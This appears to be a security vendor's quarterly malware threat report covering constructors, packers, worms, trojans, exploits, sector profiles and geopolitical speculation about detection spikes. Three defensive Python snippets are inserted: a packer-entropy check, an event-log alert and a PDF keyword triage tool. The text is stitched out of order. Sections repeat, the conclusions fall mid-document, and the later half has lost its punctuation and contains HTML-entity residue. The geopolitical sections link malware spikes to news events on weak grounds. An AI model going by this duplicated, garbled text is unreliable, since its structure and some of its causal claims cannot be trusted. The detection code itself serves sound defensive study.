Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

"Packing" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
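Because compressed or encrypted payloads have a near-uniform byte distribution, defenders commonly score a file's regions by Shannon entropy to flag packed samples. The following is an added illustration of that heuristic, not code from the report, from Comodo or from any packer; the thresholds, window size and both sample inputs are constructed assumptions, with pseudo-random bytes standing in for a compressed body.

```python
"""Entropy-based packing heuristic (added illustration, not Comodo's or UPX's code).

Packed or encrypted code has a near-uniform byte distribution, so its Shannon
entropy approaches 8 bits per byte, while plain code and text sit well below
that. Scanning a file in fixed windows lets a defender locate the high-entropy
body that follows a small decompression stub.
"""
import math
import random
from collections import Counter
from typing import List, Tuple

# Thresholds are conventional rules of thumb (assumed), not values from the report.
PACKED_ENTROPY = 7.2   # bits/byte; compressed or encrypted data scores above this
WINDOW = 1024          # bytes per scan window (large enough for a stable estimate)


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def high_entropy_windows(data: bytes, window: int = WINDOW,
                         threshold: float = PACKED_ENTROPY) -> List[Tuple[int, float]]:
    """Return (offset, entropy) for every window whose entropy exceeds `threshold`."""
    hits = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if len(chunk) < window // 2:  # skip a short tail: too few bytes to judge
            continue
        e = shannon_entropy(chunk)
        if e > threshold:
            hits.append((off, e))
    return hits


def packed_body_offset(data: bytes, window: int = WINDOW) -> int:
    """Offset where the high-entropy body begins, or -1 if none is found.

    This reflects the layout described above: a short stub that knows how to
    decompress or decrypt, followed by the opaque payload.
    """
    hits = high_entropy_windows(data, window)
    return hits[0][0] if hits else -1


def looks_packed(data: bytes, window: int = WINDOW, min_fraction: float = 0.5) -> bool:
    """True when at least `min_fraction` of the scanned windows look compressed/encrypted."""
    total = max(1, len(data) // window)
    return len(high_entropy_windows(data, window)) / total >= min_fraction


# --- Constructed sample inputs (not real malware) ---------------------------
# Repeated assembly-like text stands in for unpacked code: a narrow byte distribution.
PLAIN_SAMPLE = b"MOV EAX, [EBP+8]; CALL decompress; JMP entry\n" * 100

# Pseudo-random bytes stand in for a compressed or encrypted body; a fixed seed
# keeps the example reproducible.
_rng = random.Random(2018)
BODY = bytes(_rng.getrandbits(8) for _ in range(4096))

# A 1024-byte low-entropy stub followed by the opaque body, mimicking a packed file.
STUB = b"\x00" * 512 + (b"UNPACK-STUB:" * 43)[:512]
PACKED_SAMPLE = STUB + BODY


def demo() -> dict:
    """Run the heuristic over both constructed samples and return the verdicts."""
    return {
        "plain_entropy": round(shannon_entropy(PLAIN_SAMPLE), 2),
        "plain_packed": looks_packed(PLAIN_SAMPLE),
        "packed_entropy": round(shannon_entropy(BODY), 2),
        "packed_packed": looks_packed(PACKED_SAMPLE),
        "body_offset": packed_body_offset(PACKED_SAMPLE),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A real packer such as UPX also leaves structural hints (renamed PE sections, a tiny code section with a large raw payload), so entropy is best used as one signal among several rather than a verdict on its own.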
In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneous to annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizen are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating of cybercriminals' bias to hunt for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
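The behaviour attributed to Starter above, an account created and then added to the administrators group, leaves a recognizable trail in the Windows Security log: an account-creation event followed seconds later by a privileged-group addition for the same account. The Python below is an added example, not code from the report or from Comodo. It pairs the two event types within a short window and runs over constructed sample records; the event IDs 4720 and 4732, the simplified record fields and the privileged-group set are assumptions about a standard Windows audit log, not values taken from the report.

```python
"""Pair 'user account created' with 'added to a privileged group' events (added example)."""
from datetime import datetime, timedelta

# Constructed sample records shaped like simplified Windows Security log events.
# Event IDs 4720 (account created) and 4732 (member added to a security-enabled
# local group) are assumed standard audit IDs; the records are not from the report.
# The account name in the first pair echoes the report's description of Starter.
SAMPLE_EVENTS = [
    {"time": "2018-06-02T09:14:03", "id": 4720, "subject": "alice",
     "target": "Remote Service Account"},
    {"time": "2018-06-02T09:14:05", "id": 4732, "subject": "alice",
     "target": "Remote Service Account", "group": "Administrators"},
    {"time": "2018-06-02T10:00:00", "id": 4720, "subject": "helpdesk", "target": "jsmith"},
    {"time": "2018-06-02T12:00:00", "id": 4732, "subject": "helpdesk",
     "target": "bob", "group": "Remote Desktop Users"},
    {"time": "2018-06-03T11:30:00", "id": 4732, "subject": "helpdesk",
     "target": "jsmith", "group": "Administrators"},
]

# Local groups whose membership grants administrative rights (assumed set).
PRIVILEGED_GROUPS = {"administrators"}


def find_suspicious_admin_creations(events, window_minutes=10):
    """Return (account, created_at, creator) for every account that was created and
    then added to a privileged group within `window_minutes`. Legitimate provisioning
    is usually slower and reviewed; creation plus elevation within seconds is the
    pattern worth alerting on."""
    window = timedelta(minutes=window_minutes)
    created = {}  # account name -> (creation time, subject that created it)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"]] = (ts, ev["subject"])
        elif ev["id"] == 4732 and ev.get("group", "").lower() in PRIVILEGED_GROUPS:
            rec = created.get(ev["target"])
            if rec is not None and ts - rec[0] <= window:
                hits.append((ev["target"], rec[0].isoformat(), rec[1]))
    return hits


if __name__ == "__main__":
    for account, when, who in find_suspicious_admin_creations(SAMPLE_EVENTS):
        print(f"ALERT: {account!r} created by {who} at {when} and elevated within 10 minutes")
```

With the default ten-minute window only the "Remote Service Account" pair is reported; the jsmith account, created one day before its elevation, and bob, added to a non-privileged group, are not. Widening the window trades false negatives for noise, so the threshold should be tuned against the site's real provisioning cadence.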
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
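Because the exploits described above targeted PDF files, a first triage step for an untrusted PDF is to look for the name objects that give a document a way to run code when it is opened. The Python below is an added example, not code from the report or from Comodo: it decodes the PDF `#xx` name escapes before matching, so a lightly obfuscated `/JavaScript` key is still counted, and scores two constructed sample documents. The list of risky names and the scoring rule are this example's own choices, not a standard.

```python
"""Static triage of PDF bytes for exploit-bearing features (added example)."""
import re

# Name objects whose presence commonly warrants a closer look in an untrusted PDF
# (example's own list: script hooks, auto-run actions, embedded payload carriers).
RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia")

# PDF allows any byte of a name to be written as #xx; decode before matching so
# an obfuscated '/J#61vaScript' is still counted as '/JavaScript'.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes (only meaningful inside names, which is where they appear)."""
    return _HEX_ESCAPE.sub(lambda m: bytes.fromhex(m.group(1).decode()), data)


def triage_pdf(data: bytes) -> dict:
    """Count risky name objects and report whether the file both auto-runs
    something on open and carries executable content."""
    norm = normalize_names(data)
    counts = {}
    for name in RISKY_NAMES:
        # A name token ends at whitespace or a delimiter, so "/JS" must not match "/JSX".
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        n = len(re.findall(pattern, norm))
        if n:
            counts[name] = n
    auto_exec = "/OpenAction" in counts or "/AA" in counts
    has_code = any(k in counts for k in ("/JavaScript", "/JS", "/Launch"))
    return {
        "header_ok": norm.startswith(b"%PDF-"),
        "counts": counts,
        "score": sum(counts.values()),
        "suspicious": auto_exec and has_code,
    }


# Constructed samples: a benign one-page skeleton and one wired to run script on open.
BENIGN_PDF = (b"%PDF-1.4\n"
              b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
SUSPICIOUS_PDF = (b"%PDF-1.4\n"
                  b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
                  b"3 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
                  b"trailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, triage_pdf(doc))
```

This is a keyword scan, not a parser: streams compressed with `/FlateDecode` hide their contents from it, so a production triage pipeline decompresses object streams first and treats a high score as a reason for sandbox detonation rather than as a verdict.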
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
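Packing replaces readable code with a compressed (or encrypted) blob plus a small decompression stub, which is why the packed section of an executable looks almost random while ordinary code and data do not. The Python below is an added example, not code from the report or from Comodo: it computes Shannon entropy per section and flags both the section names that stock UPX writes and any section whose entropy is near the 8-bit maximum, so a packer that renames or strips the stock section names is still caught. It takes a mapping of section name to raw bytes, which a PE parser (for instance the pefile library) would supply; the constructed samples, the 7.0 threshold and the section-name set are this example's own choices.

```python
"""Entropy-based check for packed or encrypted executable sections (added example)."""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Section names that stock UPX writes. A modified packer may rename them, which is
# why the entropy check below does not rely on names alone.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}


def assess_sections(sections: dict, threshold: float = 7.0) -> dict:
    """`sections` maps section name -> raw bytes (as a PE parser would provide).
    Returns per-section entropy, names matching known packers, sections above the
    entropy threshold, and an overall verdict."""
    entropies = {name: round(shannon_entropy(raw), 2) for name, raw in sections.items()}
    known = sorted(n for n in sections if n in KNOWN_PACKER_SECTIONS)
    high = sorted(n for n, e in entropies.items() if e >= threshold)
    return {
        "entropy": entropies,
        "known_packer_sections": known,
        "high_entropy_sections": high,
        "looks_packed": bool(known) or bool(high),
    }


def _pseudo_random(nbytes: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for compressed data."""
    out, block = bytearray(), seed
    while len(out) < nbytes:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:nbytes])


# Constructed samples: an unpacked program (structured, repetitive bytes and readable
# strings), a stock-UPX layout (empty UPX0, opaque UPX1 blob) and a renamed-section
# variant that only the entropy rule catches.
PLAIN_SAMPLE = {
    ".text": bytes(range(64)) * 64,
    ".data": b"Hello from an unpacked program\x00" * 100,
}
PACKED_SAMPLE = {
    "UPX0": b"",
    "UPX1": _pseudo_random(4096),
    ".rsrc": b"\x00" * 512,
}
RENAMED_PACKED_SAMPLE = {".text": b"\x90" * 64, ".packed": _pseudo_random(4096)}

if __name__ == "__main__":
    for label, s in (("plain", PLAIN_SAMPLE), ("upx", PACKED_SAMPLE),
                     ("renamed", RENAMED_PACKED_SAMPLE)):
        print(label, assess_sections(s))
```

High entropy alone is not proof of packing: legitimately compressed resources, embedded media and signed installers also score near 8.0, so in practice the verdict is combined with other signals (tiny import table, entry point outside `.text`, section with zero raw size but large virtual size) before a sample is escalated.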
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
